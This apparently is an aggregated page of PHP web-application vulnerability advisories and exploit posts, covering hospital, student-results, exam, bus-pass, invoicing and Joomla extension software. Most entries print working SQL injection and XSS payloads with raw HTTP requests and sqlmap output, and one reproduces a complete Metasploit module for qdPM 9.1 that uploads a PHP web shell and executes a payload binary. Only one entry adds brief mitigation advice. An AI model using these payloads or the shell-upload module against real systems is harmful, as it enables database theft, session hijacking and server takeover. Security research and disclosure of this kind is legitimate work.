hms-staff.php in Projectworlds Hospital Management System Mini-Project through 2018-06-17 allows SQL injection via the type parameter.

Hi

I found a SQL injection vulnerability in your hospital management system.

**Page Request:-**

    POST /hospital/hms-staff.php HTTP/1.1
    Host: 192.168.0.107
    Content-Length: 43
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Cookie: PHPSESSID=t8e8smm8d836b7lar1qb6l3avf
    Connection: close
    
    email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-
    

**The above query will only sleep the database for 10 seconds. Since it's a blind boolean-based injection, an attacker can dump all the databases using the substr()method or using the SQLMAP  tool.**

**Affect URL: http://127.0.0.1/hms-staff.php****Afftect Parameter:  type****Payload: admin+WHERE+1=1+AND+SLEEP(10)--+-****Mitigation:**

*   Performing Whitelist Input Validation
*   Use of Prepared Statements (with Parameterized Queries)

CVE-2022-33880: Vulnerability/BUG - Unauthenticated bind boolean based sql injection via type parameter on hms-staff.php page · Issue #7 · projectworldsofficial/hospital-management-system-in-php

SourceCodester Best Student Result Management System 1.0 is vulnerable to SQL Injection.

**Title: Best Student Result Management System 1.0 SQLi****Author: toyydsBT123****organize: Arr3stY0u****Organization introduction : https://www.shg-sec.com/****Date: 15.09.2022****Vendor: https://www.sourcecodester.com/users/mayurik****Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download****Version: 1.0****Reference: https://github.com/toyydsBT123/One\_of\_my\_take\_on\_SourceCodester/blob/main/Best-Student-Result-Management-System\_1.0.poc.md****Description:****The joint query injects the selected item into the query, and can obtain system information and administrator account password. The SQL injection vulnerability on this page severely compromises the security, confidentiality of the application by exposing the application to administrator level information compromise.****Status: CRITICAL****\[+\] Payloads:**

    GET
    ?nid=2' union all select null,user(),null,null-- -
    

**Proof and Exploit:**

code Firefox browser

CVE-2022-40887: One_of_my_take_on_SourceCodester/Best-Student-Result-Management-System_1.0.poc.md at main · toyydsBT123/One_of_my_take_on_SourceCodester

A remote code execution vulnerability exists in qdPM versions 9.1 and below. An attacker can upload a malicious PHP code file via the profile photo functionality by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature thus allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::EXE  include Msf::Exploit::PhpEXE  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)',        'Description' => %q{          A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier.          An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal          vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection.          NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.        },        'License' => MSF_LICENSE,        'Author' => [          'Rishal Dwivedi (Loginsoft)', # Discovery          'Leon Trappett (thepcn3rd)', # PoC          'Giacomo Casoni' # Metasploit        ],        'References' => [          ['CVE', '2020-7246'],          ['EDB', '50175']        ],        'Payload' => {          'BadChars' => "\x00"        },        'DefaultOptions' => {          'EXITFUNC' => 'thread'        },        'Platform' => %w[linux php],        'Targets' => [          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],          [ 'Windows x86', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],          [ 'Windows x64', { 'Arch' => ARCH_X64, 'Platform' => 'win' } ]        ],        'Privileged' => true,        'DisclosureDate' => '2020-11-21',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => ['CRASH_SAFE'],          'Reliability' => ['IOC_IN_LOGS'],          'SideEffects' => ['REPEATABLE_SESSION']        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base directory where qdPM resides', '/']),        OptString.new('EMAIL', [true, 'The email to login with']),        OptString.new('PASSWORD', [true, 'The password to login with'])      ]    )    self.needs_cleanup = true  end  def check    uri = normalize_uri(uri, '/index.php')    res = send_request_raw({ 'uri' => uri })    if res.nil?      return Exploit::CheckCode::Unknown    end    login_page = res.get_html_document    begin      version_num = login_page.at('div[@class="copyright"]').at('a').text.tr('qdPM ', '').to_f    rescue StandardError      return Exploit::CheckCode::Unknown    end    version = Rex::Version.new(version_num)    if version <= Rex::Version.new('9.1')      return Exploit::CheckCode::Appears    else      return Exploit::CheckCode::Safe    end  end  def get_write_exec_payload_win(fname, _data)    p = Rex::Text.encode_base64(generate_payload_exe)    php = %|    <?php    $f = fopen("#{fname}", "wb");    fwrite($f, base64_decode("#{p}"));    fclose($f);    exec("C:\\Windows\\System32\\cmd.exe /c #{fname}");    ?>    |    php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')    return php  end  def login(base, username, password)    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri("#{base}/index.php/login"),      'keep_cookies' => true    })    login_page = res.get_html_document    csrf_token = login_page.at("input[name='login[_csrf_token]']/@value")    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/login"),      'vars_post' => {        'login[email]' => username,        'login[password]' => password,        'login[_csrf_token]' => csrf_token      },      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}/#{base}/index.php/login"      }    })    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri("#{base}/index.php/myAccount"),      'keep_cookies' => true,      'headers' => {        'Host' => rhost.to_s      }    })    account_page = res.get_html_document    begin      userid = account_page.at("input[@name='users[id]']/@value").text.strip    rescue StandardError      print_error('The designated admin account does not have a user ID.')      return {}    end    username = account_page.at("input[@name='users[name]']/@value").text.strip    csrftoken_ = account_page.at("input[@name='users[_csrf_token]']/@value").text.strip    opts = {      'user_id' => userid,      'name' => username,      'csrf_token' => csrftoken_    }    return opts  end  def upload_php(base, opts)    fname = opts['filename']    php_payload = opts['data']    user_id = opts['user_id']    email = opts['email']    csrf_token = opts['csrf_token']    data = [      { 'name' => 'sf_method', 'data' => 'put' },      { 'name' => 'users[id]', 'data' => user_id },      { 'name' => 'users[photo_preview]', 'data' => '.htaccess' },      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },      { 'name' => 'users[new_password]', 'data' => '' },      { 'name' => 'users[email]', 'data' => email },      { 'name' => 'extra_fields[9]', 'data' => '' },      { 'name' => 'users[remove_photo]', 'data' => '1' }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),      'vars_form_data' => data,      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"      }    )    data = [      { 'name' => 'sf_method', 'data' => 'put' },      { 'name' => 'users[id]', 'data' => user_id },      { 'name' => 'users[photo_preview]', 'data' => '../.htaccess' },      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },      { 'name' => 'users[new_password]', 'data' => '' },      { 'name' => 'users[email]', 'data' => email },      { 'name' => 'extra_fields[9]', 'data' => '' },      { 'name' => 'users[remove_photo]', 'data' => '1' }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),      'vars_form_data' => data,      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"      }    )    data = [      { 'name' => 'sf_method', 'data' => 'put' },      { 'name' => 'users[id]', 'data' => user_id },      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },      { 'name' => 'users[new_password]', 'data' => '' },      { 'name' => 'users[email]', 'data' => email },      { 'name' => 'extra_fields[9]', 'data' => '' },      { 'name' => 'users[remove_photo]', 'data' => '1' },      { 'name' => 'users[photo]', 'data' => php_payload, 'mime_type' => 'application/octet-stream', 'filename' => fname }    ]    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),      'vars_form_data' => data,      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"      }    })    return res.code == 302  end  def exec_php(base, _opts)    res = send_request_cgi({      'uri' => normalize_uri("#{base}/index.php/myAccount"),      'keep_cookies' => true    })    home_page = res.get_html_document    backdoor = home_page.at("//input[@name='users[photo_preview]']/@value").text.strip    register_file_for_cleanup(backdoor)    send_request_cgi({      'uri' => normalize_uri("#{base}/uploads/users/#{backdoor}")    })  end  def exploit    uri = normalize_uri(target_uri.path)    user = datastore['EMAIL']    pass = datastore['PASSWORD']    print_status("Attempt to login with '#{user}:#{pass}'")    opts = login(uri, user, pass)    if opts.empty?      print_error('Login unsuccessful or bad (admin) user')      return    end    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"    case target['Platform']    when 'php'      p = get_write_exec_payload    when 'linux'      p = get_write_exec_payload(unlink_self: true)    when 'win'      bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"      bin = generate_payload_exe      p = get_write_exec_payload_win(bin_name.to_s, bin)      print_warning("#{bin_name} will require manual cleanup")    end    print_status("Uploading PHP payload (#{p.length} bytes)...")    data = {      'email' => user.to_s,      'filename' => php_fname,      'data' => p    }    data = data.merge(opts)    uploader = upload_php(uri, data)    if !uploader      print_error('Unable to upload')      return    end    print_status("Executing '#{php_fname}'")    exec_php(uri, opts)  endend

qdPM 9.1 Authenticated Shell Upload

Joomla AdsManager extension version 3.2.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : JULOA                                                                      ││  Software : AdsManager 3.2.0 Extension for Joomla                                      ││  Vuln Type: SQL Injection                                                              ││  Method   : POST                                                                       ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘POST parameter 'ad_vectormap' is vulnerable---Parameter: ad_vectormap (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') RLIKE (SELECT (CASE WHEN (8892=8892) THEN '' ELSE 0x28 END))-- TnXM&advsearch=0&new_search=1    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 2373 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(2373=2373,1))),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- lAQM&advsearch=0&new_search=1    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 4095 FROM (SELECT(SLEEP(5)))TLzG)-- UmxX&advsearch=0&new_search=1---[+] Starting the Attack[INFO] fetching current databasethe back-end DBMS is MySQLweb application technology: PHP 7.4.30, Nginxback-end DBMS: MySQL >= 5.0 (MariaDB fork)current database: 'c1demosource'[-] Done

Joomla AdsManager 3.2.0 SQL Injection

Bus Pass Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Bus Pass Management System 1.0 - 'searchdata' Cross-Site Scripting (XSS)# Date: 2022-07-02# Exploit Author: Ali Alipour# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Windows 10 Pro x64 - XAMPP Server# CVE : N/A#Issue Detail:The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response.This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.# Vulnerable page: /buspassms/download-pass.php# Vulnerable Parameter: searchdata [ POST Data ]#Request : POST /buspassms/download-pass.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3Origin: https://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: https://127.0.0.1/buspassms/download-pass.phpContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateAccept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 25searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=#Response : HTTP/1.1 200 OKDate: Fri, 01 Jul 2022 00:14:25 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8X-Powered-By: PHP/7.4.8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 6425Connection: closeContent-Type: text/html; charset=UTF-8<!DOCTYPE html><html lang="en"><head><title>Bus Pass Management System || Pass Page</title><script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba...[SNIP]...<h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>...[SNIP]...

Bus Pass Management System 1.0 Cross Site Scripting

Online Examination System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Examination System - SQL Injection# Google Dork: N/A# Date: 2022-9-28# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :vulnerable code in file account.php<?phpif(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {$eid=@$_GET['eid'];$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );echo '<div class="panel" style="margin:5%">';while($row=mysqli_fetch_array($q) )?>1) Log in to the application after register new userinject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--

Online Examination System 1.0 SQL Injection

Joomla EDocman extension version 1.23.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Ossolution Team                                                            ││  Software : EDocman 1.23.3 Extension for Joomla - Reflected XSS                        ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'filter_search' is vulnerable to XSSPath: index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=[XSS]https://joomdonationdemo.com/edocman/index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=ekmj6"onfocus="alert(1)"autofocus="fjozn[-] Done

Joomla EDocman 1.23.3 Cross Site Scripting

Online Examination System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Online Examination System - Cross site scripting Reflected# Google Dork: N/A# Date: 2022-9-29# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :vulnerable code in file index.php157 <?php if(@$_GET['q7'])158 { echo'<p style="color:red;font-size:15px;">'.@$_GET['q7'];}?>http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3Einject payload parameter q7

Online Examination System 1.0 Cross Site Scripting

A zip slip vulnerability in the file upload function of Chamilo v1.11 allows attackers to execute arbitrary code via a crafted Zip file.

CVE-2022-40407: Security issues - Chamilo LMS

BigProf Online Invoicing System before 2.9 suffers from an unauthenticated SQL Injection found in /membership_passwordReset.php (the endpoint that is responsible for issuing self-service password resets). An unauthenticated attacker is able to send a request containing a crafted payload that can result in sensitive information being extracted from the database, eventually leading into an application takeover. This vulnerability was introduced as a result of the developer trying to roll their own sanitization implementation in order to allow the application to be used in legacy environments.

Tag

#php